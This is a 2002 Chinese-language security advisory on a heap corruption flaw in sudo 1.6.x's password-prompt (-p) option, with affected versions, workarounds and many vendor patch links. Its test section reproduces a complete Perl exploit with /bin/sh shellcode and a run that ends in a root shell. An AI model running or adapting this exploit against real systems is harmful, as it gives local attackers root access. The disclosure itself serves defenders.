首页 -> 安全研究
安全研究
安全漏洞
Sudo密码提示命令行参数堆破坏漏洞
发布日期:2002-04-25
更新日期:2002-04-29
受影响系统:
Todd Miller Sudo 1.6不受影响系统:
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.1
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.2
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.3
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.3p1
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.3p2
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.3p3
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.3p4
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.3p5
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.3p6
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.3p7
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.4
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.4p1
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.4p2
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.5
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.5p1
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.5p2
- Linux系统
- Unix系统
Todd Miller Sudo 1.6.6描述:
- Linux系统
Todd Miller Sudo 1.6.6
- Unix系统
BUGTRAQ ID: 4593
Sudo是一款允许用户以其他用户权限安全的执行命令的程序,广泛使用在Linux和Unix操作系统下。
Sudo在可定制密码提示功能上存在漏洞,可以导致堆破坏。
Sudo存在一个可以允许用户指定密码提示的功能,在当sudo解析-p选项时,用户可以指定字符来扩展是否使用hostname (%h)或者username (%u),当sudo接收这些扩展字符时,会使用malloc()分配内存给传递给-p的字符串参数,攻击者可以提供超长的字符串(如超长的主机名)给-p选项时,可导致堆破坏,由于sudo以setuid root属性默认安装,可导致攻击者以root权限在本地系统上执行任意命令。
此选项取决于编译的参数,测试中支持PAM的二进制程序存在此漏洞,许多Linux版本以这种方式发行。
<*来源:Global InterSec Research (lists@globalintersec.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-04/0349.html
http://archives.neohapsis.com/archives/bugtraq/2002-04/0350.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[venglin@clitoris sudo-1.6.5p2]$ cat babunia.pl
$sudo = $ARGV[0];
$prompt = "h%h%h%h%aaaaaaaaaaaaaaaaaaaah%";
$prepad = 266;
$postpad = 512;
$retloc = hex(`objdump -R $sudo | grep '\\<_exit\\>' | cut -f1 -d' '`);
$retad = 0x8063b10;
$align = 20;
print "Prompt: $prompt\n";
print "Prepad: $prepad\n";
print "Postpad: $postpad\n";
print "Align: $align\n";
print "_exit() @ ", sprintf("0x%x\n", $retloc);
print "shellcode @ ", sprintf("0x%x\n", $retad);
$testcode = "\xeb" . chr($align);
$testcode .= "\x90" x $align;
$testcode .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c";
$testcode .= "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb";
$testcode .= "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
$frame = pack('l', 0x01010101);
$frame .= pack('l', $retloc-12);
$frame .= pack('l', $retad);
$path = "a" x $prepad;
$path .= $frame;
$path .= $testcode;
$path .= "a"x($postpad - length($testcode));
system($sudo, "-p", $prompt, $path);
[venglin@clitoris sudo-1.6.5p2]$ perl ./babunia.pl ./sudo
Prompt: h%h%h%h%aaaaaaaaaaaaaaaaaaaah%
Prepad: 266
Postpad: 512
Align: 20
_exit() @ 0x805fe40
shellcode @ 0x8063b10
litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaah%
Sorry, try again.
litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI
¨¨ry again.
litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI
¨¨ry again.
./sudo: 3 incorrect password attempts
# id
uid=0(root) gid=1000(users) egid=0(root) groups=1000(users),6(disk),23(audio),24(video)
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 使用chmod a-s去掉sudo的S位,或者清空/etc/sudoers中的所有条目。
厂商补丁:
Todd Miller
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Todd Miller Sudo 1.6:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.1:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.2:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Debian Upgrade sudo_1.6.2p2-2.2_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/sudo_1.6.2p2-2.2_alpha.deb
Debian Upgrade sudo_1.6.2p2-2.2_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/sudo_1.6.2p2-2.2_arm.deb
Debian Upgrade sudo_1.6.2p2-2.2_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/sudo_1.6.2p2-2.2_i386.deb
Debian Upgrade sudo_1.6.2p2-2.2_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/sudo_1.6.2p2-2.2_m68k.deb
Debian Upgrade sudo_1.6.2p2-2.2_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/sudo_1.6.2p2-2.2_powerpc.deb
Debian Upgrade sudo_1.6.2p2-2.2_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/sudo_1.6.2p2-2.2_sparc.deb
Todd Miller Sudo 1.6.3 p7:
Slackware Patch sudo.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/packages/sudo.tgz
Slackware 8.0.
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p6:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p5:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p4:
Slackware Patch sudo.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/packages/sudo.tgz
Slackware 7.1.
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p3:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p2:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p1:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.4 p2:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.4 p1:
Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-1.6.6-1U50_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U51_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-1.6.6-1U51_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U51_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/sudo-1.6.6-1U51_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-1.6.6-1U60_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U60_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sudo-1.6.6-1U60_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-1.6.6-1U70_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sudo-1.6.6-1U70_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sudo-1.6.6-1U8_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U8_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/sudo-1.6.6-1U8_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U51_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-doc-1.6.6-1U51_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-doc-1.6.6-1U60_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-doc-1.6.6-1U70_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sudo-doc-1.6.6-1U8_1cl.i386.rpm
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-1.6.6-1U50_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-1.6.6-1U50_1cl.i386.rpm
Todd Miller Sudo 1.6.4:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 7.1 i586.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.0 PPC Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.1 i586.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.1 i586 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.ia64.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.1 ia64.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.1 ia64 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.2 i586.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.2 i586 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.ppc.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.2 PPC.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.2 PPC Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Corporate Server 1.0.1.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Corporate Server 1.0.1 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Single Network Firewall 7.2.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Single Network Firewall 7.2 Source RPM.
Red Hat Upgrade sudo-1.6.5p2-1.6x.1.src.rpm
ftp://updates.redhat.com/6.2/en/powertools/SRPMS/sudo-1.6.5p2-1.6x.1.src.rpm
Source RPM.
Red Hat Upgrade sudo-1.6.5p2-1.6x.1.alpha.rpm
ftp://updates.redhat.com/6.2/en/powertools/alpha/sudo-1.6.5p2-1.6x.1.alpha.rpm
Red Hat Upgrade sudo-1.6.5p2-1.6x.1.i386.rpm
ftp://updates.redhat.com/6.2/en/powertools/i386/sudo-1.6.5p2-1.6x.1.i386.rpm
Red Hat Upgrade sudo-1.6.5p2-1.6x.1.sparc.rpm
ftp://updates.redhat.com/6.2/en/powertools/sparc/sudo-1.6.5p2-1.6x.1.sparc.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm
Source RPM.
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/sudo-1.6.5p2-1.7x.1.alpha.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm
ftp://updates.redhat.com/7.1/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm
Source RPM.
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/sudo-1.6.5p2-1.7x.1.alpha.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/sudo-1.6.5p2-1.7x.1.ia64.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm
ftp://updates.redhat.com/7.2/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm
Source RPM.
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/sudo-1.6.5p2-1.7x.1.ia64.rpm
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 7.1 i586 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 7.2 i586.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 7.2 i586 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.0 i586.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.0 i586 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.ppc.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.0 PPC.
Todd Miller Sudo 1.6.5 p2:
Global InterSec Patch sudo-1.6.5p3.patch
http://www.globalintersec.com/adv/files/sudo-1.6.5p3.patch
Unofficial source code patch from Global InterSec.
NetBSD Patch netbsd-sudo-pwprompt.patch
http://downloads.securityfocus.com/vulnerabilities/patches/netbsd-sudo-pwprompt.patch
Patch for the NetBSD port of sudo 1.6.5p2, for pkgsrc/security/sudo/patches.
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
OpenBSD Patch 002_sudo.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/002_sudo.patch
Patch for the OpenBSD 3.1 port of sudo.
Todd Miller Sudo 1.6.5 p1:
Slackware Upgrade sudo-1.6.6-i386-1.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/sudo-1.6.6-i386-1.tgz
Slackware -current.
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.5:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
浏览次数:4106
严重程度:0(网友投票)
绿盟科技给您安全的保障